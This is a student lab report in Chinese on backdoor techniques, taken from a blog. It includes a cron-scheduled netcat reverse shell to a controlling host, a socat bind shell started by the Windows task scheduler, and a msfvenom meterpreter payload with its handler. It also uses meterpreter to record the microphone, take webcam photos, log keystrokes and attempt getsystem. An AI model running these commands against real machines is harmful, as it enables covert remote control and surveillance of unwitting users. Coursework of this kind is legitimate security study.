20155312 张竞予 Exp2 后门原理与实践

Exp2 后门原理与实践

目录

  • 基础问题回答

    • (1)例举你能想到的一个后门进入到你系统中的可能方式?
    • (2)例举你知道的后门如何启动起来(win及linux)的方式?
    • (3)Meterpreter有哪些给你映像深刻的功能?
    • (4)如何发现自己有系统有没有被安装后门?
  • 实验总结与体会
  • 实践过程记录
    • 使用netcat获取主机操作Shell,cron启动
    • 使用socat获取主机操作Shell, 任务计划启动
    • 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
    • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

可能是我们点开某个链接的时候,自动加载了某个可执行文件,就类似于执行了实验中传入到windows中的backdoor.exe;也可能是我们点开某个网页时,该网页通过木马的方式在我们不知情的情况下自动下载了某个后门文件。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • linux中可能crontab文件被修改,周期性(定时)反向连接控制主机,只要控制主机保持侦听状态,就可以周期性启动后门,控制被控主机。
  • windows中可能是被动下载、接收了后门程序,当被控端点击运行该程序时,后门便会启动。

(3)Meterpreter有哪些给你映像深刻的功能?

能够获取被控主机的麦克风录音、获取被控主机的摄像头拍照和录像。

(4)如何发现自己有系统有没有被安装后门?

利用防火墙,在防火墙看开启的端口及对应的进程,一般不是系统默认开启的端口都是可疑的,要找一下对应的进程,找到对应进程,对相应进程进行抓包,看他通信的数据,分析是不是后门。

定期用360管家等软件对系统进行检测,及时处理疑似病毒、木马的程序。

返回目录


实践过程记录

一、使用netcat获取主机操作Shell,cron启动

首先查看WindowsIP和LinuxIP:

  • Windows下用命令ipconfig

  • Linux下用ifconfig -a

Windows获得linux的shell:

cron启动过程如下:

  1. 先在Windows系统下,监听8888端口
  2. 在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择"3";
  3. 在最后一行添加09 * * * * /bin/netcat 192.168.199.196 8888 -e /bin/sh,意思是在每个小时的第37分钟反向连接Windows主机的8888端口,设置成37的原因是我当时的时间是11点07,为了能立马看到效果,所以我将时间设置成了“09”(注意这里的IP地址应该为控制主机的IP);

4.最后运行结果如下所示:

返回目录

二、使用socat获取主机操作Shell, 任务计划启动

1.Windows+X,然后选择“控制面板”(win8下打开控制面板)

2.右上角“查看方式”选择“大图标”

3.点击管理程序->点击任务计划程序

4.选择上方菜单栏中的“操作”->“创建任务”

5.输入任务名

6.新建触发器,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:8888 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口8888,同时把cmd.exe的stderr重定向到stdout上

7.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行

8.socat - tcp:192.168.199.196:8888,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的8888端口,此时可以发现已经成功获得了一个cmd shell:(此处的IP地址为WindowsIP)

返回目录

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=8888 -f exe > 20155312_backdoor.exe,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“20155312_backdoor.exe”

2.在Windows下执行ncat.exe -l 8888 > 20155312_backdoor.exe,这样被控主机就进入了接收文件模式

3.在Linux中执行nc 192.168.199.196 8888 < 20155312_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP

4.传送接收文件成功,如下图所示:

5.在Kali中打开一个终端,使用msfconsole指令进入msf控制台

6.接着输入use exploit/multi/handler使用监听模块,设置payload

7.set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

8.set LHOST 192.168.20.136,这里用的是LinuxIP,和生成后门程序时指定的IP相同

9.set LPORT 8888,同样要使用相同的端口

10.开始监听

返回目录

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.使用record_mic指令可以截获一段音频:(可以+“-d 时间”来设定录制时间)

2.使用webcam_snap指令可以使用摄像头进行拍照:

3.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

4.先使用getuid指令查看当前用户,使用getsystem指令进行提权,由于是Win8系统,提权失败:

5.其他操作:

  • 使用screenshot指令可以进行截屏
  • 用webcam stream指令可以使用摄像头进行录像
  • ……

返回目录


实验总结与体会

通过本次实验,我学会了如果对linux和windows植入后门,包括开启侦听、反向连接、生成后门程序、传送后门程序、控制被控主机、修改定时任务列表、使用socat获取主机操作Shell等。在动手实验的过程中既体会到了作为攻击者的乐趣,更加深刻的体会到了使用计算机时增强安全意识的重要性。平时上网的时候,一定要注意不点击不靠谱链接,下载软件时尽量选择官网下载,防止下载盗版软件时被捆绑下载其他后门程序。

返回目录

原文地址:https://www.cnblogs.com/zjy1997/p/8673222.html

时间: 2024-11-05 18:51:17

20155312 张竞予 Exp2 后门原理与实践的相关文章

2019-2020-2 20175305张天钰《网络对抗技术》 Exp2 后门原理与实践

2019-2020-2 20175305张天钰<网络对抗技术> Exp2 后门原理与实践 知识点概括 后门: 不经过正常认证流程而访问系统的通道. 后门类型: 编译器留后门 操作系统留后门 应用程序中留后门 潜伏于操作系统中或伪装为特定应用的专用后门程序. 后门工具: netcat:又名nc或ncat,是一个底层工具,进行基本的TCP UDP数据收发.常被与其他工具结合使用,起到后门的作用. soCat:Netcat++,超级netcat工具. 任何代理.转发等功能都可以用该工具实现. met

20145331魏澍琛《网络对抗》Exp2 后门原理与实践

20145331魏澍琛<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类的,你一激动一点进去后门就进入你的系统了. (2)例举你知道的后门如何启动起来(win及linux)的方式? 比如下载一个游戏,下下来你会发现除了游戏快捷方式还有什么游戏大厅.游戏加速,或者什么最新的网页游戏(传奇狂暴版),你一好奇一点进去后门就启动了. (3)Meterpreter有哪些给你映像深刻的功能?

2019-2020-2 20174322童硕《网络对抗技术》Exp2 后门原理与实践

2019-2020-2 20174322童硕<网络对抗技术>Exp2 后门原理与实践 一.实验内容及预备知识 1.实验内容 2.基础问题回答 二.常用后门工具实践 任务一:Windows获得Linux Shell 任务二:Linux获得Windows Shell 任务三:使用nc传输数据 三.Meterpreter 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)

20145317彭垚《网络对抗》Exp2 后门原理与实践

20145317彭垚<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中: 例举你知道的后门如何启动起来(win及linux)的方式? Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的: 对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动: Linux下可以通过cron来启动. Meterpreter有哪些给你映像深刻的

Exp2 后门原理与实践(未完待续)

Exp2 后门原理与实践 实验环境 攻击机 kali 4.14(64位) (IP: 10.0.2.6/24) 靶机 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windows 7 sp1(64位) (IP: 10.0.2.7/24) nc/ncat的使用 nc(全称是netcat)是一个用于TCP/UDP连接和监听的linux工具,有着网络工具中的"瑞士军刀"的美誉.nc的实现版本大致有两种,一种是带有-e或-c 选项可以直接给出执行命令,另一种不支持-e选

20155321 《网络攻防》 Exp2 后门原理与实践

20155321 <网络攻防> Exp2 后门原理与实践 实验内容 例举你能想到的一个后门进入到你系统中的可能方式? 我觉得人们在平时上网的时候可能会无意识地点击到一些恶意的网站,这些网站本身可能被黑客植入了木马程序,这些程序可能会随着人们下载到本地而有机会进入到系统中. 例举你知道的后门如何启动起来(win及linux)的方式? 我所知道的是可能是黑客通过远程控制的办法是输入命令使后门程序启动起来. Meterpreter有哪些给你映像深刻的功能? 让我印象比较深刻的是可以通过后门控制摄像头

20154322 杨钦涵 Exp2 后门原理与实践

Exp2 后门原理与实践Exp2 后门原理与实践 一.基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 从网上下载软件时,可能会下载到其它附带捆绑软件,而这些软件可能就有后门程序.在安装时,便一起安装了. 2.例举你知道的后门如何启动起来(win及linux)的方式? ①自己不小心点击运行了后门程序: ②篡改了注册表,将其设为开机自动运行: ③被控端被设置了cron启动,定时循环启动: 3.Meterpreter有哪些给你映像深刻的功能? 必须是截取摄像头!像是随时有双背后的眼

20155338《网络对抗》Exp2 后门原理与实践

20155338<网络对抗>Exp2 后门原理与实践 一. 基础问题 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:游览网站中附带的广告或弹出的不正规软件. (2)例举你知道的后门如何启动起来(win及linux)的方式? 答:1.操作系统自带服务: 2.网络协议捆绑: 3.软件编写者制作: 4.漏洞攻击后放置: (3)Meterpreter有哪些给你映像深刻的功能 答:录屏,提升权限和录音. (4)如何发现自己有系统有没有被安装后门 答:用网络命令来看计算机所连接的设备有没有陌

2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成she